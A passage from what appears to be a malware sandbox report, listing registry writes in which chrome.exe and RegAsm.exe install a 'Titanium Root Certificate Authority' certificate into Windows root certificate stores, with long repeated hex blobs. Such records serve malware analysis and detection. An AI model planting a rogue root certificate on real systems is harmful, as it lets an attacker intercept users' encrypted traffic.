d660488775f4c5adf0b970d9d5c23fad51a73101b2a4959e0e5476232b9c149b047f7b9ff6e986ee1fe6f80dafb72d98c074706b7d30ff09f34816e771a4baa41c2343a7c51032b702406673a5c988323e328190a7735e1ddf786af8c2ce3b5512650f27779c5f8b61dcb48318d74954bfd3aeb5628f308bf9174e71458862738f5eb390eb90c769216a7652419bf799d65ce0e8fa9316fb34397b85ea3b320735bb8b63d9f6a7a999bc09ec1f4292b4d5f52b896321c813be33d915933a80eb672291bb8a5d1aa954a64356fafc25bb7e04b61115869340d30203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010027b6dc8e05058df9e324d57657dc6c10fb056db512ea0112ac2aa10d07f7ca7f8df4088ff9d82377c75be63a39a67e68b325c49bdd156f5cf832ea7bd25fc6f3a8042209e5cf4dc6d988b75fe1971888181ad9b3ace277ae12c516438e24efcc720cdaf977e163fa38d8cf71dd88983266801fc063acaa17d39823452910c4b2d165e93102de956b2c464cd1af251debd7edc864563519192addd247b765f5ef89e3df571277713b41eb0ced85c45e611b427327c65655a959faa0b4ee69abe93b5b8f44e789b3aa9e7e8cc0bbb8f15178760c7c6ed9724d2b288498f39614728b92ed27fa7a4d068e31a1e405f9b5991956f0327704757ada83d092e9177c41 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f0072006900740079000000140000000100000014000000367aad0cfa20b466baac8f7dc2907b563221ed7f0200000001000000cc0000001c0000006c000000010000000000000000000000000000000100000043004e003d0054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f007200690074007900000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000ef7d96611ebc296503e33bd6d8c4e46d8adecbe40f0000000100000020000000678c479c611bf7826ae2a93ab3da7a699af934444ee7ae39fb028d6d41d0a33d19000000010000001000000084bb01296272631242d94ffab4eeb99620000000010000000a03000030820306308201eea00302010202081cd1d17fc153e023300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233313231323138323333385a170d3237303331373138323333385a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100c5ad33d1a9f49f7d5eec0c7c59f3e126157a1960dbeb21246076d790790c335a798997f4675fb1d660488775f4c5adf0b970d9d5c23fad51a73101b2a4959e0e5476232b9c149b047f7b9ff6e986ee1fe6f80dafb72d98c074706b7d30ff09f34816e771a4baa41c2343a7c51032b702406673a5c988323e328190a7735e1ddf786af8c2ce3b5512650f27779c5f8b61dcb48318d74954bfd3aeb5628f308bf9174e71458862738f5eb390eb90c769216a7652419bf799d65ce0e8fa9316fb34397b85ea3b320735bb8b63d9f6a7a999bc09ec1f4292b4d5f52b896321c813be33d915933a80eb672291bb8a5d1aa954a64356fafc25bb7e04b61115869340d30203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010027b6dc8e05058df9e324d57657dc6c10fb056db512ea0112ac2aa10d07f7ca7f8df4088ff9d82377c75be63a39a67e68b325c49bdd156f5cf832ea7bd25fc6f3a8042209e5cf4dc6d988b75fe1971888181ad9b3ace277ae12c516438e24efcc720cdaf977e163fa38d8cf71dd88983266801fc063acaa17d39823452910c4b2d165e93102de956b2c464cd1af251debd7edc864563519192addd247b765f5ef89e3df571277713b41eb0ced85c45e611b427327c65655a959faa0b4ee69abe93b5b8f44e789b3aa9e7e8cc0bbb8f15178760c7c6ed9724d2b288498f39614728b92ed27fa7a4d068e31a1e405f9b5991956f0327704757ada83d092e9177c41 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000400000001000000100000002e749b9867a042dda0cb8e3492132d00140000000100000014000000367aad0cfa20b466baac8f7dc2907b563221ed7f030000000100000014000000ef7d96611ebc296503e33bd6d8c4e46d8adecbe40f0000000100000020000000678c479c611bf7826ae2a93ab3da7a699af934444ee7ae39fb028d6d41d0a33d19000000010000001000000084bb01296272631242d94ffab4eeb9960200000001000000cc0000001c0000006c000000010000000000000000000000000000000100000043004e003d0054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f007200690074007900000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e003000000000005c00000001000000040000000008000020000000010000000a03000030820306308201eea00302010202081cd1d17fc153e023300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233313231323138323333385a170d3237303331373138323333385a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100c5ad33d1a9f49f7d5eec0c7c59f3e126157a1960dbeb21246076d790790c335a798997f4675fb1d660488775f4c5adf0b970d9d5c23fad51a73101b2a4959e0e5476232b9c149b047f7b9ff6e986ee1fe6f80dafb72d98c074706b7d30ff09f34816e771a4baa41c2343a7c51032b702406673a5c988323e328190a7735e1ddf786af8c2ce3b5512650f27779c5f8b61dcb48318d74954bfd3aeb5628f308bf9174e71458862738f5eb390eb90c769216a7652419bf799d65ce0e8fa9316fb34397b85ea3b320735bb8b63d9f6a7a999bc09ec1f4292b4d5f52b896321c813be33d915933a80eb672291bb8a5d1aa954a64356fafc25bb7e04b61115869340d30203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010027b6dc8e05058df9e324d57657dc6c10fb056db512ea0112ac2aa10d07f7ca7f8df4088ff9d82377c75be63a39a67e68b325c49bdd156f5cf832ea7bd25fc6f3a8042209e5cf4dc6d988b75fe1971888181ad9b3ace277ae12c516438e24efcc720cdaf977e163fa38d8cf71dd88983266801fc063acaa17d39823452910c4b2d165e93102de956b2c464cd1af251debd7edc864563519192addd247b765f5ef89e3df571277713b41eb0ced85c45e611b427327c65655a959faa0b4ee69abe93b5b8f44e789b3aa9e7e8cc0bbb8f15178760c7c6ed9724d2b288498f39614728b92ed27fa7a4d068e31a1e405f9b5991956f0327704757ada83d092e9177c41 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = 0200000001000000cc0000001c0000006c000000010000000000000000000000000000000100000043004e003d0054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f007200690074007900000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e0030000000000019000000010000001000000084bb01296272631242d94ffab4eeb9960f0000000100000020000000678c479c611bf7826ae2a93ab3da7a699af934444ee7ae39fb028d6d41d0a33d030000000100000014000000ef7d96611ebc296503e33bd6d8c4e46d8adecbe4140000000100000014000000367aad0cfa20b466baac8f7dc2907b563221ed7f0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f007200690074007900000020000000010000000a03000030820306308201eea00302010202081cd1d17fc153e023300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233313231323138323333385a170d3237303331373138323333385a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100c5ad33d1a9f49f7d5eec0c7c59f3e126157a1960dbeb21246076d790790c335a798997f4675fb1d660488775f4c5adf0b970d9d5c23fad51a73101b2a4959e0e5476232b9c149b047f7b9ff6e986ee1fe6f80dafb72d98c074706b7d30ff09f34816e771a4baa41c2343a7c51032b702406673a5c988323e328190a7735e1ddf786af8c2ce3b5512650f27779c5f8b61dcb48318d74954bfd3aeb5628f308bf9174e71458862738f5eb390eb90c769216a7652419bf799d65ce0e8fa9316fb34397b85ea3b320735bb8b63d9f6a7a999bc09ec1f4292b4d5f52b896321c813be33d915933a80eb672291bb8a5d1aa954a64356fafc25bb7e04b61115869340d30203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010027b6dc8e05058df9e324d57657dc6c10fb056db512ea0112ac2aa10d07f7ca7f8df4088ff9d82377c75be63a39a67e68b325c49bdd156f5cf832ea7bd25fc6f3a8042209e5cf4dc6d988b75fe1971888181ad9b3ace277ae12c516438e24efcc720cdaf977e163fa38d8cf71dd88983266801fc063acaa17d39823452910c4b2d165e93102de956b2c464cd1af251debd7edc864563519192addd247b765f5ef89e3df571277713b41eb0ced85c45e611b427327c65655a959faa0b4ee69abe93b5b8f44e789b3aa9e7e8cc0bbb8f15178760c7c6ed9724d2b288498f39614728b92ed27fa7a4d068e31a1e405f9b5991956f0327704757ada83d092e9177c41 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000400000001000000100000002e749b9867a042dda0cb8e3492132d00140000000100000014000000367aad0cfa20b466baac8f7dc2907b563221ed7f030000000100000014000000ef7d96611ebc296503e33bd6d8c4e46d8adecbe40f0000000100000020000000678c479c611bf7826ae2a93ab3da7a699af934444ee7ae39fb028d6d41d0a33d19000000010000001000000084bb01296272631242d94ffab4eeb9965c0000000100000004000000000800000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00420041003600320044003000340044002d0031003100330032002d0034004500320030002d0038003400330034002d003800370046004200340031004600430035003000330032007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e0030000000000020000000010000000a03000030820306308201eea00302010202081cd1d17fc153e023300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233313231323138323333385a170d3237303331373138323333385a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100c5ad33d1a9f49f7d5eec0c7c59f3e126157a1960dbeb21246076d790790c335a798997f4675fb1d660488775f4c5adf0b970d9d5c23fad51a73101b2a4959e0e5476232b9c149b047f7b9ff6e986ee1fe6f80dafb72d98c074706b7d30ff09f34816e771a4baa41c2343a7c51032b702406673a5c988323e328190a7735e1ddf786af8c2ce3b5512650f27779c5f8b61dcb48318d74954bfd3aeb5628f308bf9174e71458862738f5eb390eb90c769216a7652419bf799d65ce0e8fa9316fb34397b85ea3b320735bb8b63d9f6a7a999bc09ec1f4292b4d5f52b896321c813be33d915933a80eb672291bb8a5d1aa954a64356fafc25bb7e04b61115869340d30203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010027b6dc8e05058df9e324d57657dc6c10fb056db512ea0112ac2aa10d07f7ca7f8df4088ff9d82377c75be63a39a67e68b325c49bdd156f5cf832ea7bd25fc6f3a8042209e5cf4dc6d988b75fe1971888181ad9b3ace277ae12c516438e24efcc720cdaf977e163fa38d8cf71dd88983266801fc063acaa17d39823452910c4b2d165e93102de956b2c464cd1af251debd7edc864563519192addd247b765f5ef89e3df571277713b41eb0ced85c45e611b427327c65655a959faa0b4ee69abe93b5b8f44e789b3aa9e7e8cc0bbb8f15178760c7c6ed9724d2b288498f39614728b92ed27fa7a4d068e31a1e405f9b5991956f0327704757ada83d092e9177c41 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = 0200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00380034004300360039003200390045002d0044003100450043002d0034004500310043002d0038003700460035002d003100330034003000440044003200460035004500390036007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e003000000000005c00000001000000040000000008000019000000010000001000000084bb01296272631242d94ffab4eeb9960f0000000100000020000000678c479c611bf7826ae2a93ab3da7a699af934444ee7ae39fb028d6d41d0a33d030000000100000014000000ef7d96611ebc296503e33bd6d8c4e46d8adecbe4140000000100000014000000367aad0cfa20b466baac8f7dc2907b563221ed7f0400000001000000100000002e749b9867a042dda0cb8e3492132d000b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f007200690074007900000020000000010000000a03000030820306308201eea00302010202081cd1d17fc153e023300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233313231323138323333385a170d3237303331373138323333385a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100c5ad33d1a9f49f7d5eec0c7c59f3e126157a1960dbeb21246076d790790c335a798997f4675fb1d660488775f4c5adf0b970d9d5c23fad51a73101b2a4959e0e5476232b9c149b047f7b9ff6e986ee1fe6f80dafb72d98c074706b7d30ff09f34816e771a4baa41c2343a7c51032b702406673a5c988323e328190a7735e1ddf786af8c2ce3b5512650f27779c5f8b61dcb48318d74954bfd3aeb5628f308bf9174e71458862738f5eb390eb90c769216a7652419bf799d65ce0e8fa9316fb34397b85ea3b320735bb8b63d9f6a7a999bc09ec1f4292b4d5f52b896321c813be33d915933a80eb672291bb8a5d1aa954a64356fafc25bb7e04b61115869340d30203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010027b6dc8e05058df9e324d57657dc6c10fb056db512ea0112ac2aa10d07f7ca7f8df4088ff9d82377c75be63a39a67e68b325c49bdd156f5cf832ea7bd25fc6f3a8042209e5cf4dc6d988b75fe1971888181ad9b3ace277ae12c516438e24efcc720cdaf977e163fa38d8cf71dd88983266801fc063acaa17d39823452910c4b2d165e93102de956b2c464cd1af251debd7edc864563519192addd247b765f5ef89e3df571277713b41eb0ced85c45e611b427327c65655a959faa0b4ee69abe93b5b8f44e789b3aa9e7e8cc0bbb8f15178760c7c6ed9724d2b288498f39614728b92ed27fa7a4d068e31a1e405f9b5991956f0327704757ada83d092e9177c41 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = 0200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00380042003400410037003400340045002d0033003400340044002d0034004400440031002d0038004300430031002d003200330032004300430039004600370034004500410046007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e003000000000005c00000001000000040000000008000019000000010000001000000084bb01296272631242d94ffab4eeb9960f0000000100000020000000678c479c611bf7826ae2a93ab3da7a699af934444ee7ae39fb028d6d41d0a33d030000000100000014000000ef7d96611ebc296503e33bd6d8c4e46d8adecbe4140000000100000014000000367aad0cfa20b466baac8f7dc2907b563221ed7f0400000001000000100000002e749b9867a042dda0cb8e3492132d000b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f007200690074007900000020000000010000000a03000030820306308201eea00302010202081cd1d17fc153e023300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233313231323138323333385a170d3237303331373138323333385a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100c5ad33d1a9f49f7d5eec0c7c59f3e126157a1960dbeb21246076d790790c335a798997f4675fb1d660488775f4c5adf0b970d9d5c23fad51a73101b2a4959e0e5476232b9c149b047f7b9ff6e986ee1fe6f80dafb72d98c074706b7d30ff09f34816e771a4baa41c2343a7c51032b702406673a5c988323e328190a7735e1ddf786af8c2ce3b5512650f27779c5f8b61dcb48318d74954bfd3aeb5628f308bf9174e71458862738f5eb390eb90c769216a7652419bf799d65ce0e8fa9316fb34397b85ea3b320735bb8b63d9f6a7a999bc09ec1f4292b4d5f52b896321c813be33d915933a80eb672291bb8a5d1aa954a64356fafc25bb7e04b61115869340d30203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010027b6dc8e05058df9e324d57657dc6c10fb056db512ea0112ac2aa10d07f7ca7f8df4088ff9d82377c75be63a39a67e68b325c49bdd156f5cf832ea7bd25fc6f3a8042209e5cf4dc6d988b75fe1971888181ad9b3ace277ae12c516438e24efcc720cdaf977e163fa38d8cf71dd88983266801fc063acaa17d39823452910c4b2d165e93102de956b2c464cd1af251debd7edc864563519192addd247b765f5ef89e3df571277713b41eb0ced85c45e611b427327c65655a959faa0b4ee69abe93b5b8f44e789b3aa9e7e8cc0bbb8f15178760c7c6ed9724d2b288498f39614728b92ed27fa7a4d068e31a1e405f9b5991956f0327704757ada83d092e9177c41 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000400000001000000100000002e749b9867a042dda0cb8e3492132d00140000000100000014000000367aad0cfa20b466baac8f7dc2907b563221ed7f030000000100000014000000ef7d96611ebc296503e33bd6d8c4e46d8adecbe40f0000000100000020000000678c479c611bf7826ae2a93ab3da7a699af934444ee7ae39fb028d6d41d0a33d19000000010000001000000084bb01296272631242d94ffab4eeb9965c0000000100000004000000000800000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00380030004600390044003800310033002d0030004600460036002d0034003000340032002d0039003100360046002d003100390034004300340036003900360043004300420034007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e0030000000000020000000010000000a03000030820306308201eea00302010202081cd1d17fc153e023300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233313231323138323333385a170d3237303331373138323333385a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100c5ad33d1a9f49f7d5eec0c7c59f3e126157a1960dbeb21246076d790790c335a798997f4675fb1d660488775f4c5adf0b970d9d5c23fad51a73101b2a4959e0e5476232b9c149b047f7b9ff6e986ee1fe6f80dafb72d98c074706b7d30ff09f34816e771a4baa41c2343a7c51032b702406673a5c988323e328190a7735e1ddf786af8c2ce3b5512650f27779c5f8b61dcb48318d74954bfd3aeb5628f308bf9174e71458862738f5eb390eb90c769216a7652419bf799d65ce0e8fa9316fb34397b85ea3b320735bb8b63d9f6a7a999bc09ec1f4292b4d5f52b896321c813be33d915933a80eb672291bb8a5d1aa954a64356fafc25bb7e04b61115869340d30203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010027b6dc8e05058df9e324d57657dc6c10fb056db512ea0112ac2aa10d07f7ca7f8df4088ff9d82377c75be63a39a67e68b325c49bdd156f5cf832ea7bd25fc6f3a8042209e5cf4dc6d988b75fe1971888181ad9b3ace277ae12c516438e24efcc720cdaf977e163fa38d8cf71dd88983266801fc063acaa17d39823452910c4b2d165e93102de956b2c464cd1af251debd7edc864563519192addd247b765f5ef89e3df571277713b41eb0ced85c45e611b427327c65655a959faa0b4ee69abe93b5b8f44e789b3aa9e7e8cc0bbb8f15178760c7c6ed9724d2b288498f39614728b92ed27fa7a4d068e31a1e405f9b5991956f0327704757ada83d092e9177c41 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = 0200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340046004500410038004400320042002d0030004500410042002d0034004200460033002d0038003000300041002d003000450030004300320046004100340045003200320045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e003000000000005c00000001000000040000000008000019000000010000001000000084bb01296272631242d94ffab4eeb9960f0000000100000020000000678c479c611bf7826ae2a93ab3da7a699af934444ee7ae39fb028d6d41d0a33d030000000100000014000000ef7d96611ebc296503e33bd6d8c4e46d8adecbe4140000000100000014000000367aad0cfa20b466baac8f7dc2907b563221ed7f0400000001000000100000002e749b9867a042dda0cb8e3492132d000b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f007200690074007900000020000000010000000a03000030820306308201eea00302010202081cd1d17fc153e023300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233313231323138323333385a170d3237303331373138323333385a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100c5ad33d1a9f49f7d5eec0c7c59f3e126157a1960dbeb21246076d790790c335a798997f4675fb1d660488775f4c5adf0b970d9d5c23fad51a73101b2a4959e0e5476232b9c149b047f7b9ff6e986ee1fe6f80dafb72d98c074706b7d30ff09f34816e771a4baa41c2343a7c51032b702406673a5c988323e328190a7735e1ddf786af8c2ce3b5512650f27779c5f8b61dcb48318d74954bfd3aeb5628f308bf9174e71458862738f5eb390eb90c769216a7652419bf799d65ce0e8fa9316fb34397b85ea3b320735bb8b63d9f6a7a999bc09ec1f4292b4d5f52b896321c813be33d915933a80eb672291bb8a5d1aa954a64356fafc25bb7e04b61115869340d30203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010027b6dc8e05058df9e324d57657dc6c10fb056db512ea0112ac2aa10d07f7ca7f8df4088ff9d82377c75be63a39a67e68b325c49bdd156f5cf832ea7bd25fc6f3a8042209e5cf4dc6d988b75fe1971888181ad9b3ace277ae12c516438e24efcc720cdaf977e163fa38d8cf71dd88983266801fc063acaa17d39823452910c4b2d165e93102de956b2c464cd1af251debd7edc864563519192addd247b765f5ef89e3df571277713b41eb0ced85c45e611b427327c65655a959faa0b4ee69abe93b5b8f44e789b3aa9e7e8cc0bbb8f15178760c7c6ed9724d2b288498f39614728b92ed27fa7a4d068e31a1e405f9b5991956f0327704757ada83d092e9177c41 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = 0200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00360031003600440043003200320039002d0037003500450035002d0034003100410039002d0039004400330042002d003000460034003600420046003700320032003200310043007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e003000000000005c00000001000000040000000008000019000000010000001000000084bb01296272631242d94ffab4eeb9960f0000000100000020000000678c479c611bf7826ae2a93ab3da7a699af934444ee7ae39fb028d6d41d0a33d030000000100000014000000ef7d96611ebc296503e33bd6d8c4e46d8adecbe4140000000100000014000000367aad0cfa20b466baac8f7dc2907b563221ed7f0400000001000000100000002e749b9867a042dda0cb8e3492132d000b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f007200690074007900000020000000010000000a03000030820306308201eea00302010202081cd1d17fc153e023300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233313231323138323333385a170d3237303331373138323333385a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100c5ad33d1a9f49f7d5eec0c7c59f3e126157a1960dbeb21246076d790790c335a798997f4675fb1d660488775f4c5adf0b970d9d5c23fad51a73101b2a4959e0e5476232b9c149b047f7b9ff6e986ee1fe6f80dafb72d98c074706b7d30ff09f34816e771a4baa41c2343a7c51032b702406673a5c988323e328190a7735e1ddf786af8c2ce3b5512650f27779c5f8b61dcb48318d74954bfd3aeb5628f308bf9174e71458862738f5eb390eb90c769216a7652419bf799d65ce0e8fa9316fb34397b85ea3b320735bb8b63d9f6a7a999bc09ec1f4292b4d5f52b896321c813be33d915933a80eb672291bb8a5d1aa954a64356fafc25bb7e04b61115869340d30203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010027b6dc8e05058df9e324d57657dc6c10fb056db512ea0112ac2aa10d07f7ca7f8df4088ff9d82377c75be63a39a67e68b325c49bdd156f5cf832ea7bd25fc6f3a8042209e5cf4dc6d988b75fe1971888181ad9b3ace277ae12c516438e24efcc720cdaf977e163fa38d8cf71dd88983266801fc063acaa17d39823452910c4b2d165e93102de956b2c464cd1af251debd7edc864563519192addd247b765f5ef89e3df571277713b41eb0ced85c45e611b427327c65655a959faa0b4ee69abe93b5b8f44e789b3aa9e7e8cc0bbb8f15178760c7c6ed9724d2b288498f39614728b92ed27fa7a4d068e31a1e405f9b5991956f0327704757ada83d092e9177c41 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = 0200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00420041003600320044003000340044002d0031003100330032002d0034004500320030002d0038003400330034002d003800370046004200340031004600430035003000330032007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e003000000000005c00000001000000040000000008000019000000010000001000000084bb01296272631242d94ffab4eeb9960f0000000100000020000000678c479c611bf7826ae2a93ab3da7a699af934444ee7ae39fb028d6d41d0a33d030000000100000014000000ef7d96611ebc296503e33bd6d8c4e46d8adecbe4140000000100000014000000367aad0cfa20b466baac8f7dc2907b563221ed7f0400000001000000100000002e749b9867a042dda0cb8e3492132d000b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f007200690074007900000020000000010000000a03000030820306308201eea00302010202081cd1d17fc153e023300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233313231323138323333385a170d3237303331373138323333385a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100c5ad33d1a9f49f7d5eec0c7c59f3e126157a1960dbeb21246076d790790c335a798997f4675fb1d660488775f4c5adf0b970d9d5c23fad51a73101b2a4959e0e5476232b9c149b047f7b9ff6e986ee1fe6f80dafb72d98c074706b7d30ff09f34816e771a4baa41c2343a7c51032b702406673a5c988323e328190a7735e1ddf786a